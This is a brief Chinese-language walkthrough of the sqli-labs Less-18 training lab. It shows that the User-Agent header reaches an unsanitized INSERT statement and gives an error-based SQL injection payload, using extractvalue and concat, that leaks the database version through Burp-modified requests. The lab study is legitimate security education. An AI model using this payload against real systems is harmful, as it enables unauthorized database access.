0%

sqli-labs靶场Less-18(useragent注入)

Less18

本关可以从源码了解到对unamepasswd进行了check_input()函数的处理,所以这里无法注入了。

1
2
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);

但是代码中将useragentip插入到数据库中,可以使用useragent进行注入

1
INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)

使用burp抓包修改useragent看看

image

修改useragent报错注入

1
' and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '1'='1

image

可以看到已经得到版本号了